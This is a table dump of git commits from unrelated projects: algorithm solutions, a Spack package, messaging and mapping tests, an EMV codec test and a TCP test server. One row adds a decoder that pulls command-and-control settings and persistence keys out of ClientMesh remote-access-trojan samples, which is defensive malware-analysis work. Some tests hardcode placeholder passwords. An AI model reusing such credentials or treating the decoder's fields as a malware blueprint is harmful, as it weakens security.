commit stringlengths 40 40 | subject stringlengths 4 1.73k | repos stringlengths 5 127k | old_file stringlengths 2 751 | new_file stringlengths 2 751 | new_contents stringlengths 1 8.98k | old_contents stringlengths 0 6.59k | license stringclasses 13
values | lang stringclasses 23
values |
|---|---|---|---|---|---|---|---|---|
55637514e578421e749f90f1ae8bd782831abffb | Add ClientMesh Decoder | kevthehermit/RATDecoders | malwareconfig/decoders/clientmesh.py | malwareconfig/decoders/clientmesh.py | from base64 import b64decode
from malwareconfig.common import Decoder
from malwareconfig.common import string_printable
class ClientMesh(Decoder):
decoder_name = "ClientMesh"
decoder__version = 1
decoder_author = "@kevthehermit"
decoder_description = "ClientMesh Decoder"
def __init__(self):
self.config = {}
def get_config(self):
'''
This is the main entry
:return:
'''
file_data = self.file_info.file_data
splits = file_data.split(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7e')
config_data = b64decode(splits[-1]).decode('utf-8')
fields = config_data.split('``')
config_dict = {
'Domain': fields[0],
'Port': fields[1],
'Password': fields[2],
'CampaignID': fields[3],
'MsgBoxFlag': fields[4],
'MsgBoxTitle': fields[5],
'MsgBoxText': fields[6],
'Startup': fields[7],
'RegistryKey': fields[8],
'RegistryPersistance': fields[9],
'LocalKeyLogger': fields[10],
'VisibleFlag': fields[11],
'Unknown': fields[12]
}
# Set the config to the class for use
self.config = config_dict
| mit | Python | |
0018765068ed533bed6adaa33a7634c104850034 | Create RomanToInt_001.py | Chasego/cod,cc13ny/algo,Chasego/codi,cc13ny/algo,Chasego/cod,Chasego/cod,cc13ny/algo,cc13ny/algo,Chasego/codi,Chasego/codirit,cc13ny/Allin,Chasego/codi,Chasego/cod,Chasego/codirit,Chasego/codi,Chasego/codirit,Chasego/codirit,cc13ny/Allin,cc13ny/algo,Chasego/codirit,Chasego/cod,cc13ny/Allin,Chasego/codi,cc13ny/Allin,cc13ny/Allin | leetcode/013-Roman-to-Integer/RomanToInt_001.py | leetcode/013-Roman-to-Integer/RomanToInt_001.py | class Solution(object):
def romanToInt(self, s):
"""
:type s: str
:rtype: int
"""
r2i = {'I':1, 'V':5, 'X':10, 'L':50,
'C':100, 'D':500, 'M':1000}
res = 0
for i in range(len(s)):
if i == len(s) - 1 or r2i[s[i]] >= r2i[s[i + 1]]:
res += r2i[s[i]]
else:
res -= r2i[s[i]]
return res
| mit | Python | |
709229c8126a532ca6813298b0d90515a5c1ad9d | test to submit file to databank | dataflow/DataStage,dataflow/DataStage,dataflow/DataStage | test/FileShare/tests/OXDSDataset.py | test/FileShare/tests/OXDSDataset.py | # ---------------------------------------------------------------------
#
# Copyright (c) 2012 University of Oxford
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, --INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# ---------------------------------------------------------------------
from __future__ import with_statement
import logging
import urlparse
import sys,os
import tempfile
import urllib
import urllib2
import zipfile
import unittest
import rdflib
import xattr
sys.path.append("../..")
from datastage.namespaces import OXDS, DCTERMS, RDF, FOAF, bind_namespaces
from datastage.dataset.base import Dataset
import datastage.util.serializers
from datastage.util.multipart import MultiPartFormData
logger = logging.getLogger(__name__)
class OXDSDataset(unittest.TestCase):
logger.debug("Starting transfer to repository")
def setUp(self):
return
def tearDown(self):
return
def get_opener(self):
password_manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
password_manager.add_password(None,urlparse.urlparse('http://databank/datastage/')._replace(path='/').geturl(),'admin','test')
basic_auth_handler = PreemptiveBasicAuthHandler(password_manager)
opener = urllib2.build_opener(basic_auth_handler)
return opener
def testMe(self):
fname = "/tmp/a.txt"
stat_info = os.stat(fname)
with open(fname, 'rb') as fileData:
opener = self.get_opener()
data = MultiPartFormData(files=[{'name': 'file','filename': fname,'stream': fileData,'mimetype': 'text/plain','size': stat_info.st_size}])
#data = MultiPartFormData(files=[{'name': 'file','filename': fname,'stream': fileData,'mimetype': 'text/plain','size': stat_info.st_size,'Content-type': data.content_type,'Content-length': data.content_length}])
opener.open('http://databank/datastage/'+ 'datasets/' + 'dd', data=data, method='POST',headers={'Content-type': data.content_type,'Content-length': data.content_length})
return
class PreemptiveBasicAuthHandler(urllib2.HTTPBasicAuthHandler):
def https_request(self, request):
credentials = self.passwd.find_user_password(None, request.get_full_url())
if all(credentials):
request.add_header(self.auth_header, 'Basic %s' % base64.b64encode(':'.join(credentials)))
return request
# Assemble test suite
from MiscLib import TestUtils
def getTestSuite(select="unit"):
testdict = {
"unit":
[
],
"component":
[ "testMe"
],
"integration":
[ "testIntegration"
],
"pending":
[ "testPending"
]
}
return TestUtils.getTestSuite(OXDSDataset, testdict, select=select)
# Run unit tests directly from command line
if __name__ == "__main__":
TestUtils.runTests("OXDSDataset", getTestSuite, sys.argv)
# End.
| mit | Python | |
180cae4ec364cf1b2bf9d1f733999a538c5f516f | Create test-events.py | arienchen/pytibrv | test/python/test-events.py | test/python/test-events.py | import datetime
import time
from tibrv.tport import *
from tibrv.status import *
from tibrv.tport import *
from tibrv.events import *
from tibrv.disp import *
import unittest
class EventTest(unittest.TestCase, TibrvMsgCallback):
@classmethod
def setUpClass(cls):
status = Tibrv.open()
if status != TIBRV_OK:
raise TibrvError(status)
@classmethod
def tearDownClass(cls):
Tibrv.close()
def callback(self, event: TibrvEvent, msg: TibrvMsg, closure):
print('RECV [{}] < {}'.format(msg.sendSubject, str(msg)))
self.msg_recv = msg
# detech from TIBRV, must destroy later
status = msg.detach()
self.assertEqual(TIBRV_OK, status, TibrvStatus.text(status))
def test_create(self):
tx = TibrvTx()
status = tx.create(None, None, None)
self.assertEqual(TIBRV_OK, status, TibrvStatus.text(status))
que = TibrvQueue()
status = que.create('TEST')
self.assertEqual(TIBRV_OK, status, TibrvStatus.text(status))
# Create an INBOX
subj = tx.inbox()
lst = TibrvListener()
status = lst.create(que, self, tx, subj)
self.assertEqual(TIBRV_OK, status, TibrvStatus.text(status))
disp = TibrvDispatcher()
status = disp.create(que)
self.assertEqual(TIBRV_OK, status, TibrvStatus.text(status))
m = TibrvMsg()
m.setStr('DATA', 'TEST')
print('')
self.msg_recv = None
status = tx.send(m, subj)
self.timeout = time.time() + 10000
while time.time() <= self.timeout:
if self.msg_recv is not None:
break
time.sleep(0.1)
#print('SLEEP...')
self.assertIsNotNone(self.msg_recv)
self.assertEqual(m.getStr('DATA'), self.msg_recv.getStr('DATA'))
del self.msg_recv
del m
del disp
del lst
del que
del tx
if __name__ == "__main__" :
unittest.main(verbosity=2)
| bsd-3-clause | Python | |
95fdd1f96ad4d54fb75ea134ea2195808d4c1116 | Add python script to check big-O notation | prabhugs/scripts,prabhugs/scripts | bigO.py | bigO.py | import timeit
import random
for i in range (10000, 100000, 20000):
t = timeit.Timer("random.randrange(%d) in x"%i, "from __main__ import random, x")
x = list(range(i))
list_time = t.timeit(number = 1000)
x = {j:None for j in range(i)}
dict_time = t.timeit(number = 1000)
print "Counter: " + str(i) + " List: " + str(list_time) + " Dict: " + str(dict_time)
| mit | Python | |
a0ae12ddf581eb77af5ce5c6498c26745bd2cfcb | Add script to extract code/data size after make examples. | jfpoilpret/fast-arduino-lib,jfpoilpret/fast-arduino-lib,jfpoilpret/fast-arduino-lib,jfpoilpret/fast-arduino-lib | stats.py | stats.py | #!/usr/bin/python
# encoding: utf-8
from __future__ import with_statement
import argparse, re, sys
def filter(args):
bytes_extractor = re.compile(r"([0-9]+) bytes")
with args.output:
with args.input:
for line in args.input:
if line.startswith("avr-size"):
# Find example name (everything after last /)
example = line[line.rfind("/") + 1:-1]
elif line.startswith("Program:"):
# Find number of bytes of flash
matcher = bytes_extractor.search(line)
program = matcher.group(1)
elif line.startswith("Data:"):
# Find number of bytes of SRAM
matcher = bytes_extractor.search(line)
data = matcher.group(1)
# Write new line to output
args.output.write("%s\t%s\t%s\n" % (example, program, data))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description = 'XXXXXXXX')
parser.add_argument('input', nargs='?', type=argparse.FileType('r'), default=sys.stdin)
parser.add_argument('output', nargs='?', type=argparse.FileType('w'), default=sys.stdout)
args = parser.parse_args()
filter(args)
| lgpl-2.1 | Python | |
23080dfea3ce6997c1cbd784da674902aa8a8cbe | test looping from Ingenico format, through pBER and back to Ingenico | mmattice/pyemvtlv | test/test_loop_ingenico.py | test/test_loop_ingenico.py | from pyemvtlv.codec.ingenico import decoder as ingdec
from pyemvtlv.codec.ingenico import encoder as ingenc
from pyemvtlv.codec.binary import decoder as berdec
from pyemvtlv.codec.binary import encoder as berenc
from binascii import hexlify
import unittest
class RecodeTestCase(unittest.TestCase):
def testFull(self):
return None
self.startstring = 'T4F:07:hA0000000031010<FS>T57:13:h4888930000000000D00000000000000000000F<FS>T82:02:h1C00<FS>T84:07:hA0000000031010<FS>T95:05:h8000000000<FS>T9A:03:h160114<FS>T9B:02:h6800<FS>T9C:01:h00<FS>T5F2A:02:h0840<FS>T5F34:01:h00<FS>T9F02:06:h000000000215<FS>T9F03:06:h000000000000<FS>T9F06:07:hA0000000031010<FS>T9F09:02:h008C<FS>T9F10:07:h06010A03A0A000<FS>T9F11:01:h01<FS>T9F1A:02:h0840<FS>T9F21:03:h171335<FS>T9F26:08:h2777D84D51E607C4<FS>T9F27:01:h80<FS>T9F33:03:hE0F8C8<FS>T9F34:03:h1E0300<FS>T9F35:01:h22<FS>T9F36:02:h0032<FS>T9F37:04:h980D0885<FS>T9F39:01:h05<FS>T9F40:05:hF000F0A001<FS>T9F41:04:h00000042<FS>T9F53:01:h52<FS>'.replace('<FS>', '\x1c') # T50:0B:aVisa Credit<FS>T9F1E:08:a80330127<FS>
subs = self.startstring
ingdecodelist = []
while subs:
y, subs = ingdec.decode(subs)
ingdecodelist.append(y)
berencodelist = []
for y in ingdecodelist:
berencodelist.append(berenc.encode(y))
subs = ''.join(berencodelist)
berdecodelist = []
while subs:
y, subs = berdec.decode(subs)
berdecodelist.append(y)
ingencodelist = []
for y in berdecodelist:
ingencodelist.append(ingenc.encode(y))
teststring = ''.join(ingencodelist)
self.assertEqual(self.startstring, teststring)
def testSingle(self):
self.startstring = 'T4F:07:hA0000000031010<FS>T57:13:h4888930000000000D00000000000000000000F<FS>T82:02:h1C00<FS>T84:07:hA0000000031010<FS>T95:05:h8000000000<FS>T9A:03:h160114<FS>T9B:02:h6800<FS>T9C:01:h00<FS>T5F2A:02:h0840<FS>T5F34:01:h00<FS>T9F02:06:h000000000215<FS>T9F03:06:h000000000000<FS>T9F06:07:hA0000000031010<FS>T9F09:02:h008C<FS>T9F10:07:h06010A03A0A000<FS>T9F11:01:h01<FS>T9F1A:02:h0840<FS>T9F21:03:h171335<FS>T9F26:08:h2777D84D51E607C4<FS>T9F27:01:h80<FS>T9F33:03:hE0F8C8<FS>T9F34:03:h1E0300<FS>T9F35:01:h22<FS>T9F36:02:h0032<FS>T9F37:04:h980D0885<FS>T9F39:01:h05<FS>T9F40:05:hF000F0A001<FS>T9F41:04:h00000042<FS>T9F53:01:h52<FS>'.replace('<FS>', '\x1c') # T50:0B:aVisa Credit<FS>T9F1E:08:a80330127<FS>
sep = '\x1c'
substrates = (x + sep for x in self.startstring.split(sep))
for subs in substrates:
if subs == sep:
continue
results = []
a, remainder = ingdec.decode(subs)
results.append(a)
self.assertEquals(remainder, '')
b = berenc.encode(a)
results.append(hexlify(b))
c, remainder = berdec.decode(b)
results.append(c)
self.assertEquals(remainder, '')
d = ingenc.encode(c)
results.append(d)
if subs != d:
print results
self.assertEqual(subs, d)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | Python | |
31e7415f29d22d3ecf709fc0a447c95232b0e294 | Create server.py | filip-marinic/LGS_SimSuite | server.py | server.py | #!/usr/bin/env python
# LGS SimSuite Server
#Copyright (c) 2015 Filip Marinic
from time import sleep, gmtime, strftime
import socket
import math
import sys
TCP_S_IP = '0.0.0.0'
BUFFER_SIZE = 10
FRAME_ID = 1000000000
frames_sent = 0
MESSAGE = "_9HXuFd6BoQGA0t5nvoLfOBUhP9rKGCFKPUG6JvFfBr6zJZDwzHlgTyCoBk04sxPQEaQ20PoeyRtYcZwETCusXclo8K1cvb9eqtc34zAGfF3b4KQDkTv3yobKHwUZUTwiCGXfzqO9gYvFTZAuHJCX2imLo4KzILiyQn97zFAhm2jj8Al4PC6ZKQDveGkO8WMM6EWVOJpjtkpewq7BhknLkqUtYSKUDiEbNShKGn1uzaupMAhtovSgYSsPo6baCnFRD3fy9gxQp8mK63wbeT9umnmrSipY3j9mvyszJviiQnXmkb3kaGrSTuTuVwwQIh7KtYRHORWn0G0rF7irQX9OJVWEQQXFAGc6323QhIfNudhHJgczC2HSyDCjPZG3aqKHYXUL9ndqt66QCgsplXyoSfIf6cZ84lzcN7ssGfG6GJIX6GTQ1bavjhuUvJofdYXF1N2rXONxOtgXcdbGksRcm3fN0gTeqO0l2cnMPRYOAv4s4xHs469tC0xKTsKky5Fu15LXohKIVeW0VyPEr4stZdIqdhfyTXcbLHjNjvXPGt5DM7Z4DS6NCcSwVodcBOrELkACd6SEqwNuMe9HXuFd6BoQGA0t5nvoLfOBUhP9rKGCFKPUG6JvFfBr6zJZDwzHlgTyCoBk04sxPQEaQ20PoeyRtYcZwETCusXclo8K1cvb9eqtc34zAGfF3b4KQDkTv3yobKHwUZUTwiCGXfzqO9gYvFTZAuHJCX2imLo4KzILiyQn97zFAhm2jj8Al4PC6ZKQDveGkO8WMM6EWVOJpjtkpewq7BhknLkqUtYSKUDiEbNShKGn1uzaupMAhtovSgYSsPo6baCnFRD3fy9gxQp8mK63wbeT9umnmrSipY3j9mvyszJviiQnXmkb3kaGrSTuTuVwwQIh7KtYRHORWn0G0rF7irQX9OJVWEQQXFAGc6323QhIfNudhHJgczC2HSyDCjPZG3aqKHYXUL9ndqt66QCgsplXyoSfIf6cZ84lzcN7ssGfG6GJIX6GTQ1bavjhuUvJofdYXF1N2rXONxOtgXcdbGksRcm3fN0gTeqO0l2cnMPRYOAv4s4xHs469tC0xKTsKky5Fu15LXohKIVeW0VyPEr4stZdIqdhfyTXcbLHjNjvXPGt5DM7Z4DS6NCcSwVodcBOrELkACd6SEqwNuMey5Fu15LXohKIVeW0VyPEr4stZdIqdhfyTXcbLHjNjvXPGt5DM7Z4DS6NCcSwVodcBOrELkACd6SEqwNuMejvXPr63"
try:
try:
if len(sys.argv) > 2:
TCP_S_PORT = int(sys.argv[1])
if int(sys.argv[2]) > 0 : period = float(1300/((float(sys.argv[2])*1000)/8)) #Frame size divided by Bytes/s
else : period = 0
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 240000)
s.bind((TCP_S_IP, TCP_S_PORT))
s.listen(True)
except:
print "Cannot open port for listening."
sys.exit(1)
while True:
conn, addr = s.accept()
packet = conn.recv(BUFFER_SIZE, socket.MSG_WAITALL)
if packet :
received_message = packet[:10]
if received_message == "terminated":
conn.close()
frames_requested = 0
else :
frames_requested = int(received_message) - 1000000000
else : frames_requested = 0
timestamp = strftime("%d/%m/%Y-%H:%M:%S", gmtime())
if frames_requested > 0 :
print "\nFrames requested: ", frames_requested
print "Initiating transfer..."
while ((FRAME_ID - 1000000000) < frames_requested):
FRAME_ID += 1
timestamp = "_" + strftime("%d/%m/%Y-%H:%M:%S", gmtime())
PACKET = str(FRAME_ID) + timestamp + MESSAGE
frames_sent += 1
conn.send(PACKET)
sleep(period)
print "Total frames sent: ", frames_sent
frames_requested = 0
FRAME_ID = 1000000000
frames_sent = 0
except (KeyboardInterrupt):
conn.close()
s.close()
sys.exit(1)
| mit | Python | |
151a5a64aa5d0e3a2b4e63c7f07916efa087b8a2 | Create car-fleet.py | tudennis/LeetCode---kamyu104-11-24-2015,tudennis/LeetCode---kamyu104-11-24-2015,kamyu104/LeetCode,kamyu104/LeetCode,tudennis/LeetCode---kamyu104-11-24-2015,kamyu104/LeetCode,tudennis/LeetCode---kamyu104-11-24-2015,tudennis/LeetCode---kamyu104-11-24-2015,kamyu104/LeetCode,kamyu104/LeetCode | Python/car-fleet.py | Python/car-fleet.py | # Time: O(nlogn)
# Space: O(n)
# N cars are going to the same destination along a one lane road.
# The destination is target miles away.
#
# Each car i has a constant speed speed[i] (in miles per hour),
# and initial position position[i] miles towards the target along the road.
#
# A car can never pass another car ahead of it,
# but it can catch up to it, and drive bumper to bumper at the same speed.
#
# The distance between these two cars is ignored - they are assumed to
# have the same position.
#
# A car fleet is some non-empty set of cars driving at the same position
# and same speed.
# Note that a single car is also a car fleet.
#
# If a car catches up to a car fleet right at the destination point,
# it will still be considered as one car fleet.
#
# How many car fleets will arrive at the destination?
#
# Example 1:
#
# Input: target = 12, position = [10,8,0,5,3], speed = [2,4,1,1,3]
# Output: 3
# Explanation:
# The cars starting at 10 and 8 become a fleet, meeting each other at 12.
# The car starting at 0 doesn't catch up to any other car, so it is a fleet
# by itself.
# The cars starting at 5 and 3 become a fleet, meeting each other at 6.
# Note that no other cars meet these fleets before the destination,
# so the answer is 3.
#
# Note:
# - 0 <= N <= 10 ^ 4
# - 0 < target <= 10 ^ 6
# - 0 < speed[i] <= 10 ^ 6
# - 0 <= position[i] < target
# - All initial positions are different.
class Solution(object):
def carFleet(self, target, position, speed):
"""
:type target: int
:type position: List[int]
:type speed: List[int]
:rtype: int
"""
times = [float(target-p)/s for p, s in sorted(zip(position, speed))]
result, curr = 0, 0
for t in reversed(times):
if t > curr:
result += 1
curr = t
return result
| mit | Python | |
67d7f3fc03c6bc031f73b53348b140e7f24567c1 | Add opennurbs package (#6570) | krafczyk/spack,LLNL/spack,tmerrick1/spack,tmerrick1/spack,matthiasdiener/spack,tmerrick1/spack,mfherbst/spack,tmerrick1/spack,LLNL/spack,krafczyk/spack,iulian787/spack,matthiasdiener/spack,matthiasdiener/spack,iulian787/spack,mfherbst/spack,EmreAtes/spack,krafczyk/spack,krafczyk/spack,mfherbst/spack,krafczyk/spack,mfherbst/spack,matthiasdiener/spack,iulian787/spack,EmreAtes/spack,EmreAtes/spack,tmerrick1/spack,matthiasdiener/spack,LLNL/spack,EmreAtes/spack,LLNL/spack,iulian787/spack,LLNL/spack,mfherbst/spack,iulian787/spack,EmreAtes/spack | var/spack/repos/builtin/packages/opennurbs/package.py | var/spack/repos/builtin/packages/opennurbs/package.py | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
import glob
class Opennurbs(Package):
"""OpenNURBS is an open-source NURBS-based geometric modeling library
and toolset, with meshing and display / output functions.
"""
homepage = "https://github.com/OpenNURBS/OpenNURBS"
url = "https://github.com/OpenNURBS/OpenNURBS.git"
maintainers = ['jrood-nrel']
version('develop',
git='https://github.com/OpenNURBS/OpenNURBS.git',
branch='develop')
version('percept', '59163fd085a24c7a4c2170c70bb60fea',
url='https://github.com/PerceptTools/percept/raw/master/build-cmake/opennurbs-percept.tar.gz')
variant('shared', default=True,
description="Build shared libraries")
# CMake installation method
def install(self, spec, prefix):
cmake_args = [
'-DBUILD_SHARED_LIBS:BOOL=%s' % (
'ON' if '+shared' in spec else 'OFF')
]
cmake_args.extend(std_cmake_args)
with working_dir('spack-build', create=True):
cmake('..', *cmake_args)
make()
make('install')
# Pre-cmake installation method
@when('@percept')
def install(self, spec, prefix):
make(parallel=False)
# Install manually
mkdir(prefix.lib)
mkdir(prefix.include)
install('libopenNURBS.a', prefix.lib)
install_tree('zlib', join_path(prefix.include, 'zlib'))
headers = glob.glob(join_path('.', '*.h'))
for h in headers:
install(h, prefix.include)
| lgpl-2.1 | Python | |
d7eaf7c3010b7cec0ef53f033badaa11748224e7 | add link test | echinopsii/net.echinopsii.ariane.community.cli.python3 | tests/acceptance/mapping/link_at.py | tests/acceptance/mapping/link_at.py | # Ariane CLI Python 3
# Link acceptance tests
#
# Copyright (C) 2015 echinopsii
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
from ariane_clip3.mapping import MappingService, Node, Container, Endpoint, EndpointService, Transport, Link, \
LinkService
__author__ = 'mffrench'
class LinkTest(unittest.TestCase):
def setUp(self):
args = {'type': 'REST', 'base_url': 'http://localhost:6969/ariane/', 'user': 'yoda', 'password': 'secret'}
MappingService(args)
self.container1 = Container(name="test_container1", gate_uri="ssh://my_host/docker/test_container1",
primary_admin_gate_name="container name space (pid)", company="Docker",
product="Docker", c_type="container")
self.container1.save()
self.node1 = Node(name="mysqld", container_id=self.container1.cid)
self.node1.save()
self.endpoint1 = Endpoint(url="mysql://test_container1:4385", parent_node_id=self.node1.nid)
self.endpoint1.save()
self.container2 = Container(name="test_container2", gate_uri="ssh://my_host/docker/test_container2",
primary_admin_gate_name="container name space (pid)", company="Docker",
product="Docker", c_type="container")
self.container2.save()
self.node2 = Node(name="mysql.cli", container_id=self.container2.cid)
self.node2.save()
self.endpoint2 = Endpoint(url="mysql://test_container2:12385", parent_node_id=self.node1.nid)
self.endpoint2.save()
self.transport = Transport(name="transport_test")
self.transport.save()
def tearDown(self):
self.endpoint1.remove()
self.endpoint2.remove()
self.node1.remove()
self.node2.remove()
self.container1.remove()
self.container2.remove()
def test_create_remove_link_basic(self):
link = Link(source_endpoint_id=self.endpoint1.id, target_endpoint_id=self.endpoint2.id,
transport_id=self.transport.id)
link.save()
self.assertIsNotNone(link.id)
self.assertIsNone(link.remove())
def test_find_link_by_id(self):
link = Link(source_endpoint_id=self.endpoint1.id, target_endpoint_id=self.endpoint2.id,
transport_id=self.transport.id)
link.save()
self.assertIsNotNone(LinkService.find_link(lid=link.id))
link.remove()
self.assertIsNone(LinkService.find_link(lid=link.id))
def test_get_links(self):
init_link_count = LinkService.get_links().__len__()
link = Link(source_endpoint_id=self.endpoint1.id, target_endpoint_id=self.endpoint2.id,
transport_id=self.transport.id)
link.save()
self.assertEqual(LinkService.get_links().__len__(), init_link_count + 1)
link.remove()
self.assertEqual(LinkService.get_links().__len__(), init_link_count) | agpl-3.0 | Python | |
aa2ddd886cc344889b53eed2ca8102fe5dc0aed4 | Make tf_saved_model/debug_info.py a bit more strict. | annarev/tensorflow,frreiss/tensorflow-fred,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow,paolodedios/tensorflow,arborh/tensorflow,arborh/tensorflow,sarvex/tensorflow,davidzchen/tensorflow,renyi533/tensorflow,xzturn/tensorflow,Intel-tensorflow/tensorflow,freedomtan/tensorflow,gunan/tensorflow,paolodedios/tensorflow,petewarden/tensorflow,annarev/tensorflow,freedomtan/tensorflow,yongtang/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,Intel-Corporation/tensorflow,adit-chandra/tensorflow,Intel-Corporation/tensorflow,karllessard/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-pywrap_saved_model,jhseu/tensorflow,renyi533/tensorflow,xzturn/tensorflow,davidzchen/tensorflow,gautam1858/tensorflow,gunan/tensorflow,aldian/tensorflow,ppwwyyxx/tensorflow,Intel-tensorflow/tensorflow,adit-chandra/tensorflow,Intel-Corporation/tensorflow,freedomtan/tensorflow,petewarden/tensorflow,tensorflow/tensorflow-pywrap_saved_model,gunan/tensorflow,cxxgtxy/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,jhseu/tensorflow,adit-chandra/tensorflow,gunan/tensorflow,aldian/tensorflow,karllessard/tensorflow,petewarden/tensorflow,xzturn/tensorflow,davidzchen/tensorflow,annarev/tensorflow,jhseu/tensorflow,jhseu/tensorflow,Intel-tensorflow/tensorflow,freedomtan/tensorflow,arborh/tensorflow,cxxgtxy/tensorflow,ppwwyyxx/tensorflow,sarvex/tensorflow,paolodedios/tensorflow,aldian/tensorflow,adit-chandra/tensorflow,petewarden/tensorflow,arborh/tensorflow,davidzchen/tensorflow,davidzchen/tensorflow,Intel-tensorflow/tensorflow,petewarden/tensorflow,karllessard/tensorflow,tensorflow/tensorflow,sarvex/tensorflow,Intel-Corporation/tensorflow,renyi533/tensorflow,frreiss/tensorflow-fred,ppwwyyxx/tensorflow,Intel-tensorflow/tensorflow,gautam1858/tensorflow,adit-chandra/tensorflow,Intel
-tensorflow/tensorflow,yongtang/tensorflow,sarvex/tensorflow,jhseu/tensorflow,gautam1858/tensorflow,davidzchen/tensorflow,renyi533/tensorflow,frreiss/tensorflow-fred,gunan/tensorflow,jhseu/tensorflow,ppwwyyxx/tensorflow,tensorflow/tensorflow,gunan/tensorflow,jhseu/tensorflow,renyi533/tensorflow,freedomtan/tensorflow,davidzchen/tensorflow,tensorflow/tensorflow,paolodedios/tensorflow,gautam1858/tensorflow,gunan/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,frreiss/tensorflow-fred,gautam1858/tensorflow,adit-chandra/tensorflow,Intel-Corporation/tensorflow,tensorflow/tensorflow,yongtang/tensorflow,aldian/tensorflow,adit-chandra/tensorflow,annarev/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_saved_model,yongtang/tensorflow,annarev/tensorflow,ppwwyyxx/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,annarev/tensorflow,Intel-Corporation/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,aam-at/tensorflow,tensorflow/tensorflow-pywrap_saved_model,ppwwyyxx/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,paolodedios/tensorflow,gunan/tensorflow,tensorflow/tensorflow-pywrap_saved_model,frreiss/tensorflow-fred,gautam1858/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,aam-at/tensorflow,cxxgtxy/tensorflow,arborh/tensorflow,xzturn/tensorflow,gautam1858/tensorflow,gunan/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow,freedomtan/tensorflow,renyi533/tensorflow,jhseu/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,xzturn/tensorflow,arborh/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,arborh/tensorflow,arborh/tensorflow,adit-chandra/tensorflow,tensorflow/tensorflow-pywrap_saved_model,davidzchen/tensorflow,aldian/tensorflow,xzturn/tensorflow,xzturn/tensorflow,jhseu/tensorflow,paolodedios/tensorfl
ow,petewarden/tensorflow,gautam1858/tensorflow,petewarden/tensorflow,yongtang/tensorflow,cxxgtxy/tensorflow,cxxgtxy/tensorflow,sarvex/tensorflow,ppwwyyxx/tensorflow,aam-at/tensorflow,freedomtan/tensorflow,karllessard/tensorflow,petewarden/tensorflow,Intel-Corporation/tensorflow,karllessard/tensorflow,jhseu/tensorflow,annarev/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-pywrap_saved_model,Intel-Corporation/tensorflow,davidzchen/tensorflow,tensorflow/tensorflow,renyi533/tensorflow,Intel-tensorflow/tensorflow,jhseu/tensorflow,arborh/tensorflow,Intel-tensorflow/tensorflow,karllessard/tensorflow,renyi533/tensorflow,aam-at/tensorflow,aldian/tensorflow,adit-chandra/tensorflow,freedomtan/tensorflow,petewarden/tensorflow,gunan/tensorflow,paolodedios/tensorflow,gautam1858/tensorflow,annarev/tensorflow,renyi533/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,frreiss/tensorflow-fred,davidzchen/tensorflow,cxxgtxy/tensorflow,renyi533/tensorflow,yongtang/tensorflow,freedomtan/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,aam-at/tensorflow,gautam1858/tensorflow,frreiss/tensorflow-fred,adit-chandra/tensorflow,arborh/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,frreiss/tensorflow